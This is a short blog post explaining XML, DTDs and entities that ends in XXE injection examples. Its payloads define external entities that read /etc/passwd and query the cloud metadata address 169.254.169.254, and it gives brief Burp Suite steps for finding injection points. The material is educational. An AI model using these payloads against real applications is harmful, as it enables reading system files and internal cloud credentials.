Markup Language: What is XML?

goay xuan hui
2 min readApr 5, 2021

--

What is XML?

XML (eXtensible Markup Langague) is a markup language used for storing and transporting data.

XML data does not require any conversion when transferred between different systems because of its platform-independent and programming language independent nature.

What do you need to know about XML?

XML contains two important documents:

#1 Document Type Definition (DTD) Document — Defines the structure, elements and the attributes of an XML document.

<!DOCTYPE note 
[ 
   <!ELEMENT note (to,from,heading,body)> 
   <!ELEMENT to (#PCDATA)> --> Defines "to" element to be of type #PCDATA
   <!ELEMENT from (#PCDATA)> 
   <!ELEMENT heading (#PCDATA)> 
   <!ELEMENT body (#PCDATA)> 
]
>NOTE: #PCDATA means parseable character data.

#2 eXtensible Markup Language (XML) Document — Markup language used for storing and transporting data that is both human and machine readable.

<?xml version="1.0" encoding="UTF-8"?>
   <!DOCTYPE note SYSTEM "note.dtd">
      <note> --> ROOT element (compulsory)
         <to>falcon</to> --> Children element
         <from>feast</from> --> Children element
         <heading>hacking</heading> --> Children element
         <body>XXE attack</body> --> Children element
      </note>

Another important element in XML is ENTITY. Entities can be used to replace the value of an element. There are different types of entities:

  • Internal — Entity defined within local DTD.
<?xml version="1.0" encoding="UTF-8"?>
   <!DOCTYPE foo [<!ENTITY xxe "forexample">] >
      <userInfo>
         <firstName>John</firstName>
         <lastName>&xxe;</lastName>
      </userInfo>Output: Hello John forexample
  • External — Entity defined outside of local DTD through the use of keyword “SYSTEM”.
<?xml version="1.0" encoding="UTF-8"?>
   <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">] >
      <userInfo>
         <firstName>John</firstName>
         <lastName>&xxe;</lastName>
      </userInfo>Output: Hello John root:x:0:0:root<?xml version="1.0" encoding="UTF-8"?>
   <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/">] >
      <userInfo>
         <firstName>John</firstName>
         <lastName>&xxe;</lastName>
      </userInfo>

Where to look for XML vulnerability?

  1. Test how the application works by inputting values to the form → Turn on the interceptor in Burp Suite.
  2. You can see that the application is using XML to transport data → We can then try to inject our code to exploit XML vulnerability.
What Is Xml
Markup Language
Dtd
Document Type Definition
Xml Entity

--

--

goay xuan hui

Written by goay xuan hui

35 Followers

A food lover, a cyber security enthusiast, a musician and a traveller, so you will see a mix of different contents in my blog. ☺️

More from goay xuan hui

Recommended from Medium

Lists

Mandelbrot set

Staff Picks

332 stories85 saves

Stories to Help You Level-Up at Work

19 stories55 saves

Self-Improvement 101

20 stories107 saves

Productivity 101

20 stories118 saves

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Text to speech